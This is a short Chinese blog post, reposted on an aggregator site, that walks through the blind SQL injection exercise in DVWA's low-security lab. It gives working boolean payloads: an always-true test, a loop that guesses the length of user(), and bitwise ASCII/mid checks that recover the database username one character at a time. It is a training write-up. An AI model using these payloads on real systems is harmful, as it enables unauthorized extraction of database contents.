首页 > 数据库技术 > 详细

low security dvwa--SQL Injection(Blind)

时间:2016-09-26 20:02:18      阅读:291      评论:0      收藏:0      [点我收藏+]

1.输入单引号,结果如下:

技术分享

2.输入永真式

1 and 1=1; -- 

结果如下:

技术分享

多次测试,如果输入的条件为假,就会返回1中的结果,为真则返回2中的结果,由此说明这属于SQL盲注。

3.猜解用户名长度

构造下面的SQL语句:

1 and length(user())=1; -- 

从1开始,逐渐加1,直到页面的返回结果是"User ID exists in the database",这时我们就得到了用户名的长度。在我的实验过程中,这个长度是14。

 4.猜解用户名

构造下面的SQL语句:

1 and ASCII(mid(user(),1,1))&128=128;-- 
1 and ASCII(mid(user(),1,1))&64=64;--  
1 and ASCII(mid(user(),1,1))&32=32;-- 
1 and ASCII(mid(user(),1,1))&16=16;-- 
1 and ASCII(mid(user(),1,1))&8=8;-- 
1 and ASCII(mid(user(),1,1))&4=4;-- 
1 and ASCII(mid(user(),1,1))&2=2;-- 
1 and ASCII(mid(user(),1,1))&1=1;-- 

对于用户名中的每个字符,用上面的方法逐位进行确定即可,假如用户名总共有14个字符的话,用这种方法需要进行14*8=112次。

 

low security dvwa--SQL Injection(Blind)

原文:http://www.cnblogs.com/layerlearner/p/5897904.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!